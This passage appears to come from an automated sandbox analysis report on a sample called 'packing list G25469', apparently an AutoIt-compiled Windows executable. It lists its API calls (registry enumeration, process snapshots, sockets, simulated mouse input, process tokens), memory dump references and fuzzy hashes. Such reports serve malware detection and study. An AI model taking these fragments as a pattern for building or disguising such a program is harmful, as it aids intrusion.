                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00B990BC
                                                  • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00B990D6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: LongWindow$MessageSend
                                                  • String ID:
                                                  • API String ID: 2178440468-0
                                                  • Opcode ID: a58bc3ef4e21f94cb9b376ae8702aeb3571cf53577d385b734fe6b81e9d80aa4
                                                  • Instruction ID: 5ccc68831242d05f554b02fe5320c3c3281f3e383637d650de91a2df575bb7bf
                                                  • Opcode Fuzzy Hash: a58bc3ef4e21f94cb9b376ae8702aeb3571cf53577d385b734fe6b81e9d80aa4
                                                  • Instruction Fuzzy Hash: CA310034600215EFDF218F5CDC89F6437E5EB4A714F1406A8FA29CB2B2CBB2A840DB41
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B708F2
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B70918
                                                  • SysAllocString.OLEAUT32(00000000), ref: 00B7091B
                                                  • SysAllocString.OLEAUT32(?), ref: 00B70939
                                                  • SysFreeString.OLEAUT32(?), ref: 00B70942
                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 00B70967
                                                  • SysAllocString.OLEAUT32(?), ref: 00B70975
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                  • String ID:
                                                  • API String ID: 3761583154-0
                                                  • Opcode ID: 327f7e90bdceafb3b0bba400397994dd6b21398508b9a4cf4efb5b9c01c393b9
                                                  • Instruction ID: 45a1d64c8e8cac063733eefc105375ff9729c23000c7baf4aed1e1fd7e366ffb
                                                  • Opcode Fuzzy Hash: 327f7e90bdceafb3b0bba400397994dd6b21398508b9a4cf4efb5b9c01c393b9
                                                  • Instruction Fuzzy Hash: 58219776611219AF9B10AF6CCC84DBB73ECEB09360B40C166FA19DB251EA74ED458760
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: __wcsnicmp
                                                  • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                  • API String ID: 1038674560-2734436370
                                                  • Opcode ID: 159eed685e71700c24e431a6d4698ef1a6f331f57a9addb368f0982595687aac
                                                  • Instruction ID: f4b18c8d648d735f68c0464bdd888349876e9d58a59a1e4eb815d55a88e0b7f4
                                                  • Opcode Fuzzy Hash: 159eed685e71700c24e431a6d4698ef1a6f331f57a9addb368f0982595687aac
                                                  • Instruction Fuzzy Hash: 4421377220421177D720AB249C53FBBB3D8EF75310F24C4E9F99E97181E6619A42C395
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B709CB
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B709F1
                                                  • SysAllocString.OLEAUT32(00000000), ref: 00B709F4
                                                  • SysAllocString.OLEAUT32 ref: 00B70A15
                                                  • SysFreeString.OLEAUT32 ref: 00B70A1E
                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 00B70A38
                                                  • SysAllocString.OLEAUT32(?), ref: 00B70A46
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                  • String ID:
                                                  • API String ID: 3761583154-0
                                                  • Opcode ID: 6b7b00be413e2b6d3d29a9da3fd64c96780bc0b43dc85a779126d2bf38e97979
                                                  • Instruction ID: a3f9d31d3f5e8184295c43b1e35937e932c0c5691f4939b1d1ccc8739786c6da
                                                  • Opcode Fuzzy Hash: 6b7b00be413e2b6d3d29a9da3fd64c96780bc0b43dc85a779126d2bf38e97979
                                                  • Instruction Fuzzy Hash: 5E217475214204AFDB10AFACDC88DAB77ECEF08360B00C166F919CB2A1EA74ED418764
                                                  APIs
                                                    • Part of subcall function 00B4D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B4D1BA
                                                    • Part of subcall function 00B4D17C: GetStockObject.GDI32(00000011), ref: 00B4D1CE
                                                    • Part of subcall function 00B4D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B4D1D8
                                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00B9A32D
                                                  • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00B9A33A
                                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00B9A345
                                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00B9A354
                                                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00B9A360
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CreateObjectStockWindow
                                                  • String ID: Msctls_Progress32
                                                  • API String ID: 1025951953-3636473452
                                                  • Opcode ID: 454df0382f3b5b48a7c631999546bd6c4edabe34e7bcbf073e77ecb4daa78db9
                                                  • Instruction ID: 6d9f87bca50fb960466099e8f409f6625108423a10badf0e103951e474607e4e
                                                  • Opcode Fuzzy Hash: 454df0382f3b5b48a7c631999546bd6c4edabe34e7bcbf073e77ecb4daa78db9
                                                  • Instruction Fuzzy Hash: 2011B6B1150119BEEF115F65CC85EE77F6DFF08798F014124FA04A6060C7729C21DBA4
                                                  APIs
                                                  • GetClientRect.USER32(?,?), ref: 00B4CCF6
                                                  • GetWindowRect.USER32(?,?), ref: 00B4CD37
                                                  • ScreenToClient.USER32(?,?), ref: 00B4CD5F
                                                  • GetClientRect.USER32(?,?), ref: 00B4CE8C
                                                  • GetWindowRect.USER32(?,?), ref: 00B4CEA5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Rect$Client$Window$Screen
                                                  • String ID:
                                                  • API String ID: 1296646539-0
                                                  • Opcode ID: af962cfcbb31deedff297db0b6f536ea2ee66c1c4e5a865c9c3255be745ee225
                                                  • Instruction ID: a366f215e18028b7640ea6998ff7dd68693357a6733843a8a81d1c02891f3f2f
                                                  • Opcode Fuzzy Hash: af962cfcbb31deedff297db0b6f536ea2ee66c1c4e5a865c9c3255be745ee225
                                                  • Instruction Fuzzy Hash: BBB14B79900249DBDF50CFA8C5807EDBBF1FF08710F1495A9EC69AB250EB70AA50DB64
                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00B91C18
                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00B91C26
                                                  • __wsplitpath.LIBCMT ref: 00B91C54
                                                    • Part of subcall function 00B51DFC: __wsplitpath_helper.LIBCMT ref: 00B51E3C
                                                  • _wcscat.LIBCMT ref: 00B91C69
                                                  • Process32NextW.KERNEL32(00000000,?), ref: 00B91CDF
                                                  • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00B91CF1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                  • String ID:
                                                  • API String ID: 1380811348-0
                                                  • Opcode ID: 2842355ee7c360aaff56a56ac939e535dbde018978809481b01c41b2c19a9ab4
                                                  • Instruction ID: 756463e8c05690921acce51594a3dbc6bb7be8abe0c35c0741d9dc985077b2d4
                                                  • Opcode Fuzzy Hash: 2842355ee7c360aaff56a56ac939e535dbde018978809481b01c41b2c19a9ab4
                                                  • Instruction Fuzzy Hash: 84518071504341AFD720EF64C885EABBBECEF88754F1049AEF58597291EB70DA04CB92
                                                  APIs
                                                    • Part of subcall function 00B93C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B92BB5,?,?), ref: 00B93C1D
                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B930AF
                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B930EF
                                                  • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00B93112
                                                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00B9313B
                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00B9317E
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00B9318B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                  • String ID:
                                                  • API String ID: 3451389628-0
                                                  • Opcode ID: 2855e0c64a748e85cadfbae2bac074db1853f80d5a316358eeb562dc6e9d0098
                                                  • Instruction ID: 4d0b3e3b021560472eddbdd7fa1c7c47b3652bb38b4e9c36987559cc3b6c5db0
                                                  • Opcode Fuzzy Hash: 2855e0c64a748e85cadfbae2bac074db1853f80d5a316358eeb562dc6e9d0098
                                                  • Instruction Fuzzy Hash: 61514A31104304AFCB04EF64C895E6ABBF9FF89700F1489ADF555972A1DB71EA05CB52
                                                  APIs
                                                  • GetMenu.USER32(?), ref: 00B98540
                                                  • GetMenuItemCount.USER32(00000000), ref: 00B98577
                                                  • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00B9859F
                                                  • GetMenuItemID.USER32(?,?), ref: 00B9860E
                                                  • GetSubMenu.USER32(?,?), ref: 00B9861C
                                                  • PostMessageW.USER32(?,00000111,?,00000000), ref: 00B9866D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Menu$Item$CountMessagePostString
                                                  • String ID:
                                                  • API String ID: 650687236-0
                                                  • Opcode ID: 1211004b363ef3a445cfda74c7d66058ca327bb4a5f3c4e2382b4f1750993650
                                                  • Instruction ID: 808fac533045cbfdda16ba774e865267a12b05bb43b810c3810adbdcb83ca2a2
                                                  • Opcode Fuzzy Hash: 1211004b363ef3a445cfda74c7d66058ca327bb4a5f3c4e2382b4f1750993650
                                                  • Instruction Fuzzy Hash: 27518C75A00215AFCF11EF68C881AAEB7F4EF49310F1184A9E916BB351DF74AE418B91
                                                  APIs
                                                  • _memset.LIBCMT ref: 00B74B10
                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B74B5B
                                                  • IsMenu.USER32(00000000), ref: 00B74B7B
                                                  • CreatePopupMenu.USER32 ref: 00B74BAF
                                                  • GetMenuItemCount.USER32(000000FF), ref: 00B74C0D
                                                  • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00B74C3E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                  • String ID:
                                                  • API String ID: 3311875123-0
                                                  • Opcode ID: b5570f317c86e1c833e4504d149efd8ee30224350b401fb2e8cee8c8b7c4dab2
                                                  • Instruction ID: 5b62f30c6cfd33b25200bc36bd9613862c93adf9168aafe2af4c0302bfe19f8f
                                                  • Opcode Fuzzy Hash: b5570f317c86e1c833e4504d149efd8ee30224350b401fb2e8cee8c8b7c4dab2
                                                  • Instruction Fuzzy Hash: 3551AF70601209DFDF25CF68C988BADBBF4EF45315F248199E4399B291E7B09D44CB51
                                                  APIs
                                                  • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,00BCDC00), ref: 00B88E7C
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00B88E89
                                                  • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00B88EAD
                                                  • #16.WSOCK32(?,?,00000000,00000000), ref: 00B88EC5
                                                  • _strlen.LIBCMT ref: 00B88EF7
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00B88F6A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$_strlenselect
                                                  • String ID:
                                                  • API String ID: 2217125717-0
                                                  • Opcode ID: 058e055ddd5651562afb4cabf8d80e885ee400e8a90371ed158086db7026d52c
                                                  • Instruction ID: ab18c61486b9f684b2a66e1bba7f8c2add4a82cbbdb709676ef7933f7fe0f1f2
                                                  • Opcode Fuzzy Hash: 058e055ddd5651562afb4cabf8d80e885ee400e8a90371ed158086db7026d52c
                                                  • Instruction Fuzzy Hash: BE416F71600104ABCB14EBA4CDD5EAEB7F9EB58310F604699F51A972A1EF70EE44CB60
                                                  APIs
                                                    • Part of subcall function 00B4B34E: GetWindowLongW.USER32(?,000000EB), ref: 00B4B35F
                                                  • BeginPaint.USER32(?,?,?), ref: 00B4AC2A
                                                  • GetWindowRect.USER32(?,?), ref: 00B4AC8E
                                                  • ScreenToClient.USER32(?,?), ref: 00B4ACAB
                                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00B4ACBC
                                                  • EndPaint.USER32(?,?,?,?,?), ref: 00B4AD06
                                                  • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00BAE673
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                  • String ID:
                                                  • API String ID: 2592858361-0
                                                  • Opcode ID: 9292eb8e0366010c14a41164fd58f6897dcb4772408b42b5df3e536f2a170006
                                                  • Instruction ID: b72efcd48af7b743cd0bd74be703c1bfef4324f5c7f49b38086de7b896f5a24a
                                                  • Opcode Fuzzy Hash: 9292eb8e0366010c14a41164fd58f6897dcb4772408b42b5df3e536f2a170006
                                                  • Instruction Fuzzy Hash: 7641C371144301AFC710DF28DCC4FB67BE8EB59320F140AA9F9A5C72A2D7719945EB62
                                                  APIs
                                                  • ShowWindow.USER32(00BF1628,00000000,00BF1628,00000000,00000000,00BF1628,?,00BADC5D,00000000,?,00000000,00000000,00000000,?,00BADAD1,00000004), ref: 00B9E40B
                                                  • EnableWindow.USER32(00000000,00000000), ref: 00B9E42F
                                                  • ShowWindow.USER32(00BF1628,00000000), ref: 00B9E48F
                                                  • ShowWindow.USER32(00000000,00000004), ref: 00B9E4A1
                                                  • EnableWindow.USER32(00000000,00000001), ref: 00B9E4C5
                                                  • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00B9E4E8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Window$Show$Enable$MessageSend
                                                  • String ID:
                                                  • API String ID: 642888154-0
                                                  • Opcode ID: 806974bc37f6db326b05a2b009f234d8fa2c9e9feb7e4196c97bbe80e993842b
                                                  • Instruction ID: f745ee4292a941236d6dc2e4b8086dd8f2e7903a2d00307b644c67015258d697
                                                  • Opcode Fuzzy Hash: 806974bc37f6db326b05a2b009f234d8fa2c9e9feb7e4196c97bbe80e993842b
                                                  • Instruction Fuzzy Hash: E6410834601141AFDF26CF28C599B987BE1FF09314F5881B9EA698F3A2C775E841CB51
                                                  APIs
                                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 00B798D1
                                                    • Part of subcall function 00B4F4EA: std::exception::exception.LIBCMT ref: 00B4F51E
                                                    • Part of subcall function 00B4F4EA: __CxxThrowException@8.LIBCMT ref: 00B4F533
                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00B79908
                                                  • EnterCriticalSection.KERNEL32(?), ref: 00B79924
                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00B7999E
                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00B799B3
                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00B799D2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                  • String ID:
                                                  • API String ID: 2537439066-0
                                                  • Opcode ID: 134d1237d16b4e9ea51f0306beb99a268f3e2c1b8fd3afffef6abcae87d2cd6b
                                                  • Instruction ID: 9647e9f21452cb74cf57f4d88efd77fa65e26fdf4a57828a729741c991ebaff5
                                                  • Opcode Fuzzy Hash: 134d1237d16b4e9ea51f0306beb99a268f3e2c1b8fd3afffef6abcae87d2cd6b
                                                  • Instruction Fuzzy Hash: 9A315E31900105ABDB10AFA5DC85EAEB7B9FF45310B1481B9E904AB286EB74DE11DBA0
                                                  APIs
                                                  • GetForegroundWindow.USER32(?,?,?,?,?,?,00B877F4,?,?,00000000,00000001), ref: 00B89B53
                                                    • Part of subcall function 00B86544: GetWindowRect.USER32(?,?), ref: 00B86557
                                                  • GetDesktopWindow.USER32 ref: 00B89B7D
                                                  • GetWindowRect.USER32(00000000), ref: 00B89B84
                                                  • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00B89BB6
                                                    • Part of subcall function 00B77A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00B77AD0
                                                  • GetCursorPos.USER32(?), ref: 00B89BE2
                                                  • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00B89C44
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                  • String ID:
                                                  • API String ID: 4137160315-0
                                                  • Opcode ID: 8ea9c8e21ea04dcc1d2c372f844fb8163fd049c7cb676957eb66abcc727ee32a
                                                  • Instruction ID: 8adcb7171d81b435ebfe6f64e3b1344c268e0cfdffa920aa173f78cd5eb708fa
                                                  • Opcode Fuzzy Hash: 8ea9c8e21ea04dcc1d2c372f844fb8163fd049c7cb676957eb66abcc727ee32a
                                                  • Instruction Fuzzy Hash: AA31C172104305ABDB20EF14D849FAAB7E9FF88314F040A6AF599D7191EA71E904CB92
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00B6AFAE
                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00B6AFB5
                                                  • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00B6AFC4
